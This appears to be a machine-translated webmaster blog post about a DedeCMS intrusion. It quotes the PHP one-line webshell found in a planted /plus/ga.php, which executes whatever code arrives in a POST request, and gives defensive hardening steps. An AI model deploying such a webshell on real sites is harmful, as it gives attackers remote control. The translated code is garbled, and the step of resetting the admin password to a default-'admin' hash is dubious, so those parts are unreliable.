最近のデデクムの隠れた危険性とリスクを防ぐ方法について話す

Dedecms は、主に 2 つの主要なウェブマスター ネットワークの強力なサポートにより、ウェブサイト構築用の非常に人気のある CMS です。ただし、人気が高すぎると問題も発生し、CMS が人気になりすぎると、悪意のある人々の標的にもなります。私のウェブサイトは dedecms を使用しています。しばらく前に再び攻撃を受けました。攻撃の目的は非常に単純で、つまり、黒いリンクでした。発見した後、コードを少し変更したら復旧しました。それほど深刻ではありませんでした。この間、ウェブサイトは前回と同様に、不可解なことにファイルを再度アップロードしました。相手側にはウェブサイトのテンプレートを変更する時間がなかったにもかかわらず、これはウェブサイトのセキュリティ対策が実施されていないことを示しています。相手側はいつでも再び管理者権限を取得する可能性があるため、ウェブサイトのセキュリティ対策には特別な注意を払う必要があります。

私は物事の真相を突き止めるのが好きなので、オンラインで関連情報を探したところ、これが dedecms の脆弱性であることが分かりました。ハッカーは多次元変数を使用して正規表現の検出を回避できます。この脆弱性は主に /plus/mytag_js.php で発生します。原理は、既知の Web サイトのデータベースを攻撃するために MySQL データベースを準備し、データベースにコードの文を書き込むことです。正常に書き込まれれば、これらのコードを使用して将来的にバックエンドの管理者権限を取得できます。

私のウェブサイトが攻撃を受けたことや、他の人の同様の経験から判断すると、ハッカーが書き込んだファイルは主に /plus/ フォルダにあります。現在知られているファイルには、ga.php、log.php、b.php、b1.php などがあります。これらのファイルの特徴は、短く、内容が非常に少ないことです。書き込むのはあまり便利ではないかもしれませんが、これらのコードの役割は確かに小さくありません。

以下は ga.php ファイルからのコードです。

<title>ログイン</title>いいえ<?php
$_POST[1]を評価する
?>
<title>ログイン</title>いいえ<?php
$_POST[1]を評価する
?>
<title>ログイン</title>いいえ<?php
$_POST[1]を評価する
?>

実際のコードは上記のものより長いですが、このコードの繰り返しです。log.php コードに関しても、これと似ており、1 文のみで、シンプルで明確です。ネットワーク セキュリティの知識が少しあれば、PHP の 1 文トロイの木馬であることが分かります。このコードは、特定のツールを使用して実行でき、パスワードをクラックする機能があると予想されます。

相手がどのような抜け穴を悪用しているか、また、どのような原理で抜け穴を悪用しているかがわかったところで、こうした危険な事態をどう防ぐことができるでしょうか。多くの情報を参考にして、抜け穴を悪用されないようにするための手順を以下にまとめました。dedecms に当てはまるウェブマスターの友人の皆さんの参考になれば幸いです。

1. バージョンをアップグレードし、パッチを適用し、ディレクトリの権限を設定する

これはこの問題に対する公式の解決策です。使用している dedecms のバージョンに関係なく、自動的にパッチを更新するために、バックグラウンドでバージョンをアップグレードする必要があります。これは、脆弱性が悪用されるのを防ぐための最も重要なステップです。同時に、公式はディレクトリを設定する方法も提供しています。主に、データ、テンプレート、アップロード、および a を読み取りと書き込みに設定しますが、実行可能権限は設定しません。include、member、plus、バックグラウンド管理ディレクトリなどは、実行可能および読み取り可能に設定しますが、書き込み可能権限は設定しません。インストールおよび特別なディレクトリを削除します。具体的な設定については、公式の説明を参照してください。

2. 管理者アカウントとパスワードを変更する

ハッカーはデフォルトの管理者アカウントを使用してパスワードを推測し、それをクラックする可能性があるため、デフォルトの管理者アカウントを変更することが非常に重要です。変更する方法はたくさんあります。より効果的な方法は、phpadmin を使用して Web サイトのデータベースにログインし、dede_admin データベース テーブル (dede はデータベース テーブルのプレフィックス) を見つけて、userid と pwd 項目を変更することです。パスワードは、デフォルトのパスワード admin である f297a57a5a743894a0e4 に変更する必要があります。変更後、バックエンドに移動してログインし、dede バックエンドにログインしてからパスワードを変更します。

3. その他注目すべき点

さらに詳しく言うと、あまりに安いスペースを選択しないように注意する必要があります。 あまりに安いスペースは、サーバー自体のセキュリティ問題に簡単につながる可能性があります。 サーバーに問題がある限り、サーバーの下にある Web サイト全体が破滅します。また、必要でない場合は、会員登録などを行わないようにしてください。非常に面倒な作業になります。ウェブサイトのバックエンドディレクトリについては、robots.txt に書き込まず、少なくとも月に 1 回は変更してください。また、管理者パスワードも他のアカウントのパスワードと同じで推測されないように変更してください。

ウェブサイトへの攻撃がいくつか発生したことから、インターネットは安らかに眠れる場所ではないと言わざるを得ません。ウェブマスターは、ネットワーク セキュリティにもっと注意を払う必要があります。必要な予防措置を講じる限り、バックエンドの権限が正常に取得されない可能性は少なくとも 95% あり、100% ではないにしても、十分です。この記事は、Aibue.com (http://www.aibue.com) によって作成されたものです。転載または協力をご希望の場合は、出典を明記してください。

元のタイトル: Dedecms の最近の隠れた危険性とリスクの防止方法について

キーワード: dedecms、dedecms の脆弱性、ウェブマスター、ウェブサイト、ウェブサイトのプロモーション、収益化